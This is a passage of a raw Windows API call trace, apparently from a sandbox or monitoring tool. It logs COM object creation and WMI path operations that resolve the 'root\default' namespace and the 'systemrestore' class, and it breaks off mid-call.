[7]=0x49)), ppvObject=0x6edbf4 | out: ppvObject=0x6edbf4*=0x0) returned 0x80004002 [0119.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edba4 | out: ppvObject=0x6edba4*=0x0) returned 0x80004002 [0119.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edbb0 | out: ppvObject=0x6edbb0*=0xbb5848) returned 0x0 [0119.144] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5848, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edbb8 | out: pCid=0x6edbb8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.144] WbemDefPath:IUnknown:Release (This=0xbb5848) returned 0x3 [0119.144] CoGetContextToken (in: pToken=0x6edc10 | out: pToken=0x6edc10) returned 0x0 [0119.144] CoGetContextToken (in: pToken=0x6ee018 | out: pToken=0x6ee018) returned 0x0 [0119.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee0a8 | out: ppvObject=0x6ee0a8*=0x0) returned 0x80004002 [0119.144] WbemDefPath:IUnknown:Release (This=0x6010bf0) returned 0x2 [0119.144] WbemDefPath:IUnknown:Release (This=0x6010bf0) returned 0x1 [0119.144] CoGetContextToken (in: pToken=0x6ee9a0 | out: pToken=0x6ee9a0) returned 0x0 [0119.144] CoGetContextToken (in: pToken=0x6ee900 | out: pToken=0x6ee900) returned 0x0 [0119.144] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010bf0, riid=0x6ee9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9cc | out: ppvObject=0x6ee9cc*=0x6010bf0) returned 0x0 [0119.144] WbemDefPath:IUnknown:AddRef (This=0x6010bf0) returned 0x3 [0119.144] WbemDefPath:IUnknown:Release (This=0x6010bf0) returned 0x2 [0119.144] WbemDefPath:IWbemPath:SetText (This=0x6010bf0, uMode=0x4, pszPath="\\\\.\\root\\default") returned 0x0 [0119.144] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb4c | out: puCount=0x6eeb4c*=0x2) returned 0x0 [0119.144] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb48*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb48*=0x11, pszText=0x0) returned 0x0 [0119.144] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb48*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb48*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.144] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb24 | out: ppv=0x6eeb24*=0xb51e34) returned 0x0 [0119.144] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb1c | out: pAptType=0x6eeb1c*=1) returned 0x0 [0119.144] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb20 | out: ppvObject=0x6eeb20*=0x0) returned 0x80004002 [0119.144] IUnknown:Release (This=0xb51e34) returned 0x1 [0119.145] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee490 | out: ppv=0x6ee490*=0x6010c60) returned 0x0 [0119.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x6010c60, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee6a8 | out: ppvObject=0x6ee6a8*=0x0) returned 0x80004002 [0119.145] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6010c60, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6bc | out: ppvObject=0x6ee6bc*=0x601f0f0) returned 0x0 [0119.145] WbemDefPath:IUnknown:Release (This=0x6010c60) returned 0x0 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2dc | out: ppvObject=0x6ee2dc*=0x601f0f0) returned 0x0 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee298 | out: ppvObject=0x6ee298*=0x0) returned 0x80004002 [0119.146] WbemDefPath:IUnknown:AddRef (This=0x601f0f0) returned 0x3 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbf4 | out: ppvObject=0x6edbf4*=0x0) returned 0x80004002 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edba4 | out: ppvObject=0x6edba4*=0x0) returned 0x80004002 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edbb0 | out: ppvObject=0x6edbb0*=0xbb5878) returned 0x0 [0119.146] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5878, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edbb8 | out: pCid=0x6edbb8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.146] WbemDefPath:IUnknown:Release (This=0xbb5878) returned 0x3 [0119.146] CoGetContextToken (in: pToken=0x6edc10 | out: pToken=0x6edc10) returned 0x0 [0119.146] CoGetContextToken (in: pToken=0x6ee018 | out: pToken=0x6ee018) returned 0x0 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee0a8 | out: ppvObject=0x6ee0a8*=0x0) returned 0x80004002 [0119.146] WbemDefPath:IUnknown:Release (This=0x601f0f0) returned 0x2 [0119.146] WbemDefPath:IUnknown:Release (This=0x601f0f0) returned 0x1 [0119.146] CoGetContextToken (in: pToken=0x6ee9a0 | out: pToken=0x6ee9a0) returned 0x0 [0119.146] CoGetContextToken (in: pToken=0x6ee900 | out: pToken=0x6ee900) returned 0x0 [0119.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f0f0, riid=0x6ee9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9cc | out: ppvObject=0x6ee9cc*=0x601f0f0) returned 0x0 [0119.146] WbemDefPath:IUnknown:AddRef (This=0x601f0f0) returned 0x3 [0119.146] WbemDefPath:IUnknown:Release (This=0x601f0f0) returned 0x2 [0119.147] WbemDefPath:IWbemPath:SetText (This=0x601f0f0, uMode=0x4, pszPath="systemrestore") returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f0f0, puCount=0x6eeb50 | out: puCount=0x6eeb50*=0x0) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetText (in: This=0x601f0f0, lFlags=2, puBuffLength=0x6eeb4c*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb4c*=0xe, pszText=0x0) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetText (in: This=0x601f0f0, lFlags=2, puBuffLength=0x6eeb4c*=0xe, pszText="0000000000000" | out: puBuffLength=0x6eeb4c*=0xe, pszText="systemrestore") returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetInfo (in: This=0x601f0f0, uRequestedInfo=0x0, puResponse=0x6eeb58 | out: puResponse=0x6eeb58*=0xc15) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f0f0, puCount=0x6eeb50 | out: puCount=0x6eeb50*=0x0) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb50 | out: puCount=0x6eeb50*=0x2) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=16, puBuffLength=0x6eeb4c*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb4c*=0xd, pszText=0x0) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=16, puBuffLength=0x6eeb4c*=0xd, pszText="000000000000" | out: puBuffLength=0x6eeb4c*=0xd, pszText="root\\default") returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetText (in: This=0x601f0f0, lFlags=2, puBuffLength=0x6eeb54*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb54*=0xe, pszText=0x0) returned 0x0 [0119.147] WbemDefPath:IWbemPath:GetText (in: This=0x601f0f0, lFlags=2, puBuffLength=0x6eeb54*=0xe, pszText="0000000000000" | out: puBuffLength=0x6eeb54*=0xe, pszText="systemrestore") returned 0x0 [0119.147] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb00 | out: ppv=0x6eeb00*=0xb51e34) returned 0x0 [0119.147] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeaf8 | out: pAptType=0x6eeaf8*=1) returned 0x0 [0119.147] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeafc | out: ppvObject=0x6eeafc*=0x0) returned 0x80004002 [0119.147] IUnknown:Release (This=0xb51e34) returned 0x1 [0119.148] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee468 | out: ppv=0x6ee468*=0x60108e0) returned 0x0 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x60108e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee680 | out: ppvObject=0x6ee680*=0x0) returned 0x80004002 [0119.148] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60108e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee694 | out: ppvObject=0x6ee694*=0x601f1d8) returned 0x0 [0119.148] WbemDefPath:IUnknown:Release (This=0x60108e0) returned 0x0 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2b4 | out: ppvObject=0x6ee2b4*=0x601f1d8) returned 0x0 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee270 | out: ppvObject=0x6ee270*=0x0) returned 0x80004002 [0119.148] WbemDefPath:IUnknown:AddRef (This=0x601f1d8) returned 0x3 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbcc | out: ppvObject=0x6edbcc*=0x0) returned 0x80004002 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb7c | out: ppvObject=0x6edb7c*=0x0) returned 0x80004002 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb88 | out: ppvObject=0x6edb88*=0xbb5898) returned 0x0 [0119.148] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5898, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edb90 | out: pCid=0x6edb90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.148] WbemDefPath:IUnknown:Release (This=0xbb5898) returned 0x3 [0119.148] CoGetContextToken (in: pToken=0x6edbe8 | out: pToken=0x6edbe8) returned 0x0 [0119.148] CoGetContextToken (in: pToken=0x6edff0 | out: pToken=0x6edff0) returned 0x0 [0119.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee080 | out: ppvObject=0x6ee080*=0x0) returned 0x80004002 [0119.149] WbemDefPath:IUnknown:Release (This=0x601f1d8) returned 0x2 [0119.149] WbemDefPath:IUnknown:Release (This=0x601f1d8) returned 0x1 [0119.149] CoGetContextToken (in: pToken=0x6ee978 | out: pToken=0x6ee978) returned 0x0 [0119.149] CoGetContextToken (in: pToken=0x6ee8d8 | out: pToken=0x6ee8d8) returned 0x0 [0119.149] WbemDefPath:IUnknown:QueryInterface (in: This=0x601f1d8, riid=0x6ee9a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9a4 | out: ppvObject=0x6ee9a4*=0x601f1d8) returned 0x0 [0119.149] WbemDefPath:IUnknown:AddRef (This=0x601f1d8) returned 0x3 [0119.149] WbemDefPath:IUnknown:Release (This=0x601f1d8) returned 0x2 [0119.149] WbemDefPath:IWbemPath:SetText (This=0x601f1d8, uMode=0x4, pszPath="systemrestore") returned 0x0 [0119.149] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb50 | out: puCount=0x6eeb50*=0x2) returned 0x0 [0119.149] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=8, puBuffLength=0x6eeb4c*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb4c*=0x11, pszText=0x0) returned 0x0 [0119.149] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=8, puBuffLength=0x6eeb4c*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb4c*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0119.149] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeaa0 | out: ppv=0x6eeaa0*=0xb51e34) returned 0x0 [0119.149] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eea98 | out: pAptType=0x6eea98*=1) returned 0x0 [0119.149] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eea9c | out: ppvObject=0x6eea9c*=0x0) returned 0x80004002 [0119.149] IUnknown:Release (This=0xb51e34) returned 0x1 [0119.150] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee408 | out: ppv=0x6ee408*=0x60108f0) returned 0x0 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x60108f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee620 | out: ppvObject=0x6ee620*=0x0) returned 0x80004002 [0119.150] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60108f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee634 | out: ppvObject=0x6ee634*=0x601ff00) returned 0x0 [0119.150] WbemDefPath:IUnknown:Release (This=0x60108f0) returned 0x0 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee254 | out: ppvObject=0x6ee254*=0x601ff00) returned 0x0 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee210 | out: ppvObject=0x6ee210*=0x0) returned 0x80004002 [0119.150] WbemDefPath:IUnknown:AddRef (This=0x601ff00) returned 0x3 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edb6c | out: ppvObject=0x6edb6c*=0x0) returned 0x80004002 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb1c | out: ppvObject=0x6edb1c*=0x0) returned 0x80004002 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb28 | out: ppvObject=0x6edb28*=0xbb58b8) returned 0x0 [0119.150] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb58b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edb30 | out: pCid=0x6edb30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0119.150] WbemDefPath:IUnknown:Release (This=0xbb58b8) returned 0x3 [0119.150] CoGetContextToken (in: pToken=0x6edb88 | out: pToken=0x6edb88) returned 0x0 [0119.150] CoGetContextToken (in: pToken=0x6edf90 | out: pToken=0x6edf90) returned 0x0 [0119.150] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee020 | out: ppvObject=0x6ee020*=0x0) returned 0x80004002 [0119.150] WbemDefPath:IUnknown:Release (This=0x601ff00) returned 0x2 [0119.150] WbemDefPath:IUnknown:Release (This=0x601ff00) returned 0x1 [0119.150] CoGetContextToken (in: pToken=0x6ee918 | out: pToken=0x6ee918) returned 0x0 [0119.151] CoGetContextToken (in: pToken=0x6ee878 | out: pToken=0x6ee878) returned 0x0 [0119.151] WbemDefPath:IUnknown:QueryInterface (in: This=0x601ff00, riid=0x6ee948*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee944 | out: ppvObject=0x6ee944*=0x601ff00) returned 0x0 [0119.151] WbemDefPath:IUnknown:AddRef (This=0x601ff00) returned 0x3 [0119.151] WbemDefPath:IUnknown:Release (This=0x601ff00) returned 0x2 [0119.151] WbemDefPath:IWbemPath:SetText (This=0x601ff00, uMode=0x4, pszPath="\\\\.\\root\\default") returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601f1d8, puCount=0x6eeaf0 | out: puCount=0x6eeaf0*=0x0) returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601ff00, puCount=0x6eeaf0 | out: puCount=0x6eeaf0*=0x2) returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetText (in: This=0x601ff00, lFlags=16, puBuffLength=0x6eeaec*=0x0, pszText=0x0 | out: puBuffLength=0x6eeaec*=0xd, pszText=0x0) returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetText (in: This=0x601ff00, lFlags=16, puBuffLength=0x6eeaec*=0xd, pszText="000000000000" | out: puBuffLength=0x6eeaec*=0xd, pszText="root\\default") returned 0x0 [0119.151] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x601f1d8) returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x601ff00, puCount=0x6eeb28 | out: puCount=0x6eeb28*=0x2) returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x601ff00, uIndex=0x0, puNameBufLength=0x6eeb24*=0x0, pName=0x0 | out: puNameBufLength=0x6eeb24*=0x5, pName=0x0) returned 0x0 [0119.151] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x601ff00, uIndex=0x0, puNameBufLength=0x6eeb24*=0x5, pName="0000" | out: puNameBufLength=0x6eeb24*=0x5, pName="root") returned 0x0 [0119.152] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x601f1d8, uIndex=0x0, pszName="root") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x601ff00, uIndex=0x1, puNameBufLength=0x6eeb24*=0x0, pName=0x0 | out: puNameBufLength=0x6eeb24*=0x8, pName=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x601ff00, uIndex=0x1, puNameBufLength=0x6eeb24*=0x8, pName="0000000" | out: puNameBufLength=0x6eeb24*=0x8, pName="default") returned 0x0 [0119.152] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x601f1d8, uIndex=0x1, pszName="default") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetServer (in: This=0x601ff00, puNameBufLength=0x6eeb20*=0x0, pName=0x0 | out: puNameBufLength=0x6eeb20*=0x2, pName=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetServer (in: This=0x601ff00, puNameBufLength=0x6eeb20*=0x2, pName="0" | out: puNameBufLength=0x6eeb20*=0x2, pName=".") returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetServer (in: This=0x601f1d8, puNameBufLength=0x6eeb20*=0x0, pName=0x0 | out: puNameBufLength=0x6eeb20*=0x2, pName=0x0) returned 0x0 [0119.152] WbemDefPath:IWbemPath:GetServer (in: This=0x601f1d8, 